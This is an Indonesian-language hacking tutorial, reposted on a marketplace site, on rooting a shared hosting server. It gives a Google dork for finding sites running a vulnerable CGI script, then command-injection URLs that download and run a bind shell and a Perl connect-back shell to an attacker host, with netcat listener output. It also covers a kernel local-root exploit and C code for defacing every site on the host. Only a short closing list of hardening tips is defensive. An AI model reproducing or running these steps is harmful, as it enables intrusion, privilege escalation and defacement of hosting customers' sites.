KECEROBOHAN WEBMASTER, PROSES JEBOLNYA ROOT SEBUAH HOSTINGLowongan kerja|tki ex magang jepang|resmi non imm|terbaru 2017


  kiri
titik tengah  CARI BARANG
banner kanan
---
  banner kiri
titik  MENU
banner kanan
  banner kiri
titik  ATURAN
banner kanan
---
  banner kiri
titik  LOGIN
banner kanan
Username
Password
 
---
  banner kiri
titik  CUSTOMER SERVICE
banner kanan
Yahoo Messenger:
Customer Services dagangku.comCustomer Services
  banner kiri
titik  BANNER
banner kanan

Video Shooting jakarta

Program Magang Jepang
User: Guest | Anda Belum Login
  TIPS & TRIK DETAIL
| Diposting oleh Rolys | Dibaca 1751 kali dari Website Dagangku.com

KECEROBOHAN WEBMASTER, PROSES JEBOLNYA ROOT SEBUAH HOSTING

KECEROBOHAN WEBMASTER, PROSES JEBOLNYA ROOT SEBUAH HOSTING

Banyak sekali tujuan sebuah proses hacking terhadap server, ada sebagian orang melakukan hacking hanya sebatas deface, untuk tujuan carding, untuk mendapat full akses (root priviledges) server, ada juga yang bertujuan untuk mematikan servis sistem dan network (Denial of Services). Proses hacking dapat dilakukan secara acak ataupun tertarget, acak dalam artian attacker melakukan proses hacking secara masal misal dengan bantuan search engine google, sedangkan tertarget maksudnya attacker melakukan hacking terhadap sebuah sistem atau server tertentu. Pada kesempatan kali ini penulis mo sharing ma temen-temen bagaimana root priviledge server sebuah hosting bisa di peroleh attacker dengan bantuan search engine (proses hacking acak) .

Banyak sekali orang beranggapan bahwa tanggung jawab sekuritas sistem dalam sebuah server anggaplah server hosting adalah tanggun jawab dari sysadmin sedangkan para webmaster site hanya berpikir agar sitenya dikunjungi dan banyak sekali para webmaster (walaupun gak semua) yang mengacuhkan sekuritas. Upzz, inilah jalan masuk terbaik bagi attacker untuk masuk ke sistem, why..?? Tentu saja karena port 80 yang harus selalu terbuka. Lalu bagaimana root priviledge sebuah server diperoleh..?? Berikut ini detail teknik yang sering dipakai oleh para attacker untuk memperoleh tujuan full akses.Hole via URL yang biasa dipakai untuk memperoleh full akses terhadap sistem adalah hole remote ekskusi seperti PHP injection dan CGI remote execution. Sebuah assumsi bahwa dalam sebuah hosting ada salah satu webmaster yang menggunakan software vulnerable yang belum terpatch misalnya w_s3adix.cgi yang di produksi oleh Y.SAK. Berikut hole dari w_s3adix.cgi yang ditemukan oleh blahpok a.k.a choi GSO community w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|command|.

Tahap pertama yang dilakukan oleh para attacker adalah menggunakan search engine google untuk mencari website yang menginstall software w_3sadix.cgi vulnerable misal dalam box keyword di isi dengan allinurl : w_3sadix.cgi? no= . Setelah attacker mendapatkan sasarannya inilah saat attacker mencoba-coba bagaimana dia memperoleh full akses terhadap sistem. Untuk memperoleh root priviledges dari hole via URL seorang attacker harus bisa memperoleh lokal shell sistem, ada dua cara yang biasa dipakai para attacker untuk memperoleh lokal shell yaitu menggunakan bindty dan teknik connectback. Perlu digaris bawahi bahwa hole yang digunakan untuk memperoleh shell adalah hole remote ekskusi yang memungkinkan bagi attacker untuk mengakses command sistem (console) via browser. Sehingga dari browser attacker bisa mendownload file ke sistem target, mengkompile dan mengekskusinya. Download script bindty ke sistem target, kompile dan ekskusi.

http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c => Code bindty shell by sd then modified by KillFinger then Modified again by Ph03n1X.

Misal anda menggunakan website http://webmu.com/bind.c untuk menghosting script bindty maka download script bindty itu ke server sistem target untuk memperoleh shell lokal target. Tentunya anda harus mendownload script tadi ke directory yang bisa anda tulisi misalnya /tmp tau /var/tmp. Kemudian kompile dan eksekusi

http://www.target.com/w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|wget
http://webmu.com/bind.c -O /var/tmp/bind.c|

http://www.target.com/w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|gcc -o
/var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000|

Lihat diatas kita menggunakan port 4000 sebagai binding port, sekarang cek apakah port 4000 terbuka, scan dengan phnxscan.c yang dibuat penulis, Kompile dan ekskusi script tadi menggunakan gcc dan scanlah port 4000 servet www.target.com.

myshell~>gcc -o phnxscan phnxscan.c

myshell~> ping -c 2 target.com
PING target.com (210.189.77.28): 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms

myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) terbuka

Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan password yang default dari scriptnya changeme

myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28...
Connected to target.com (210.189.77.28).
Escape character is '^]'.

passwd changeme
changeme

=- WELCOME TO THE SERVER -=
sh-2.05b$

Cara kedua untuk menaklukan lokal shell target adalah dengan metode connect-back menggunakan scipt buatan AresU dari 1stlink.

Seperti halnya menggunakan bindty, download script connect-back ke server target ke directory yang bisa ditulisi misalnya /tmp atau /var/tmp.

http://www.target.com/w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|wget
http://webmu.com/back.pl -O /var/tmp/back.pl|
Kemudian jalankan netcat di box anda dengan option port listen -l, box anda harus mempunyai IP publik sehingga bisa di akses cross internet (misal 212.123.24.190). Ekskusi script connect-back yang sudah di download di server target melalui browser.

myshell~> nc -l 21

www.target.com/w_s3adix.cgi?st=parameter&re=parameter&no=file.txt|perl
/var/tmp/back.pl 212.123.24.190 21|

Kemudian lihat box anda.....

myshell~>nc -l 21
(c)AresU Connect-Back Backdoor Shell v1.0
1ndonesia Security Team (1st)

Linux xxxxxxxxxxx 2.4.20-8 #1 Thu Mar 13 16:42:56 EST 2003 i586 i586 i386
GNU/Linux
uid=502(apache) gid=502(apache) groups=502(apache)

cat /etc/issue
Red Hat Linux release 9 (Shrike)
Kernel \r on an \m

Weksss, di sini penulis memperoleh target server Red Hat 9 (Shrike) yang versi kernelnya 2.4.20-8, kernel ini secara default memiliki hole lokal do_brk() yang kalo gak di patch maka privledge root bisa diperoleh. Sebuah eksploits yang biasa digunakan untuk mengekploitasi bug ini adalah hatorihanzo.c yang bisa anda download di link berikut http://student.te.ugm.ac.id/~phoenix03/audit/hatorihanzo.c . Kemudian ikuti step step berikut :

wget http://student.te.ugm.ac.id/~phoenix03/audit/hatorihanzo.
--04:00:20-- http://student.te.ugm.ac.id/%7Ephoenix03/audit/hatorihanzo.c
=> `hatorihanzo.c'
Resolving student.te.ugm.ac.id... done.
Connecting to student.te.ugm.ac.id[222.124.24.19]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,510 [text/plain]
0K ...... 100% 9.35 KB/s
04:00:24 (9.35 KB/s) - `hatorihanzo.c' saved [6510/6510]
gcc -static -o hatori hatorihanzo.c

ls -al
total 440
drwxrwxrwt 2 root root 4096 Sep 3 04:00 .
drwxr-xr-x 18 root root 4096 Sep 9 2004 ..
-rwxr-xr-x 1 root root 428460 Sep 3 04:00 hatori
-rw-r--r-- 1 root root 6510 Dec 16 2003 hatorihanzo.c

./hatori (wait a moment)

id
uid=0(root) gid=0(root)

Binggo, Sekarang anda memperoleh shell root target, yah sekarang anda adalah mahadewa di sistem itu :P~. Lalu bagaimana masalah backdooring hmm, cari referensinya di google, gunakan keyword sshdoor, shv dan lainnya. Sekarang penulis hanya hendak berbagi pengalaman tentang mass defacing server target (Assumsi penulis bahwa server yang ditaklukan adalah server hosting). Untuk mengetahui di folder mana website-website di server itu disimpan, cari file konfigurasi apache httpd.conf, baca dan perhatikan baik-baik dimana DocumentRoot dari website yang ada.

find / -name httpd.conf |
/usr/local/apache2/conf/httpd.conf

cat /usr/local/apache2/conf/httpd.conf

Berikut ini konfigurasi virtual domain yang didapat :


ServerName xxxxxxxx.jp

ServerAdmin webmaster@xxxxxxx.jp
ServerAlias xxxxxxx.jp
ScriptAlias /cgi-bin/ /home/beso-kbkb/public_html/cgi-bin/
DocumentRoot /home/beso-kbkb/public_html
user xxxxxxxx
group xxxxxxxx
CustomLog logs/210.189.77.28:80-www.xxxxxxx.jp-access.log combined
ErrorLog logs/210.189.77.28:80-www.xxxxxxxx.jp-error.log
CustomLog /home/members/public_html/logs/ xxxxxxxx /access_log combined
#LCControlDomain kbkb.beso.jp
AliasMatch ^/~([^/]+)/(.*) /home/lcvirtualdomain/ xxxxxxxx.jp/users/$1/public_html/$2


ServerName xxxxxxxx.ne.jp
ServerAdmin webmaster@ xxxxxxxx.ne.jp
ServerAlias xxxxxxxx.ne.jp
ScriptAlias /cgi-bin/ /home/ xxxxxxxx /public_html/cgi-bin/
DocumentRoot /home/ xxxxxxxx /public_html
user xxxxxxxx
group xxxxxxxx
CustomLog logs/210.189.77.28:80-www. xxxxxxxx.ne.jp-access.log
combined
ErrorLog logs/210.189.77.28:80-www. xxxxxxxx.ne.jp-error.log
CustomLog /home/members/public_html/logs/ xxxxxxxx/access_log
combined
#LCControlDomain xxxxxxxx.ne.jp
AliasMatch ^/~([^/]+)/(.*) /home/lcvirtualdomain/
xxxxxxxx.ne.jp/users/$1/public_html/$2

Sekarang bisa anda lihat bahwa DocumentRoot dari masing-masing website adalah /home/nama-website/public_html/ dan semua website terletak di subdirectory /home. Untuk melakukan deface masal lakukan langkah-langkah berikut :

cd /home
ls > host.txt
Kemudian buat script berikut, terserah bagaimana cara anda yang jelas script ini beserta hasil ekskusinya harus di simpan di directory /home.

#include "stdio.h"

/* Coded By Ph03n1X
king_purba@yahoo.co.uk
student.te.ugm.ac.id/~phoenix03
*/

main()
{
FILE *ax;
char aa[1000],bb[1000];
if((ax=fopen("host.txt","r"))==NULL)
{
printf("Gagal\n");
exit(0);
}
while(fgets(aa,sizeof(aa),ax))
{
aa[strlen(aa)-1]='\0';
snprintf(bb,sizeof(bb),"echo hack by Ph03n1X > %s/public_html/deface.txt",aa);
system(bb);
}s
ystem("find /home -name deface.txt > result.txt");
}
Simpan script diatas sebagai file berekstensi .c misal deface.c, kompile dan ekskusi di folder /home.

gcc -o deface deface.c
./deface

Sekarang lihat hasil deface masal anda di file result.txt yang dihasilkan dari ekskusi script diatas.

Setelah bisa menjebol sistem, tentu tidaklah lengkap kalo tidak bisa menambalnya. Lalu bagaimanakah seorang sysadmin seharusnya untuk meminimalkan kejadian seperti ini. lihatlah bahwa hole awal sistem adalah hole user dalam hal ini webmaster salah satu website yang di hosting di server, maka tidaklah mungkin untuk bisa memantau semua user apalagi kalo jumlahnya cukup banyak. Berikut beberapa tips untuk meminimalkan kejadian seperti ini.

1. Sering-seringlah check directory /tmp dan /var/tmp karena ini adalah directory favorit para intruder.
2. Sering-seringlah melakukan checking terhadap logs sistem seperti access_logs apache, /var/log/authlog, /var/logs/adduser dan lain-lainnya.
3. Buatlah directory /tmp dalam partisi hardisk terpisah, kemudian hapus directory /var/tmp default dan ganti dengan ln -s /tmp /var/tmp Berikan option noexec dan nosuid di partis /tmp melalui /etc/fstab misalnya :
/dev/wd0h /tmp ffs rw,noexec,noatime,nodev,nosuid 1 2.
4. Kemudian jika anda menggunakan script server side, disable semua fungsi yang digunakan untuk mengakses command system. Misalnya untuk PHP disable fungsi-fungsi berikut dari php.ini.
disable_functions = escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_get_status, proc_nice, proc_open,proc_terminate, shell_exec, system.
5. Gunakan firewall dengan default deny terutama untuk semua koneksi masuk dan forward..
6. Selalu melakukan patching jika hole baru ditemukan, untuk ini dituntut kerja keras admin dalam mencari informasi..

Anda dapat mendownload gratis Kumpulan software, tutorial, tools, artikel hacking dan aplikasi keamanan internet terlengkap
Pusat Ilmu Hacking dan system keamanan informasi

-----------------------------------------------------------------
Sumber: Coded By Ph03n1X.
king_purba@yahoo.co.uk.
student.te.ugm.ac.id/~phoenix03.

REFERENSI :.
http://google.co.id.
http://bosen.net.
http://jasakom.com.
http://echo.or.id.

Artikel Tips dan Trik lainnya

    Comment
Nama
:
Email
:
Kategori
:  
Komentar
:
   

Chat Dengan Pakar:
errorHidup adalah bangun,bangun adalah hidup.Apakah hidup dan bangun itu sama??

  inspirasi
mutiara nasehat  MUTIARA NASEHAT
nasehat

Kadang kamu terlalu memikirkan indahnya masa lalu hingga menutup diri saat ini. Lupakan mereka, temukan bahagiamu.

-:-----------------:-

  hot link
titik  HOT LINK
hot
  inspirasi
mutiara nasehat  COMMENT
nasehat

From : deby
Tanggal : 17 Apr 2013
Pesan : menyentuh hatiku...

Banner dagangku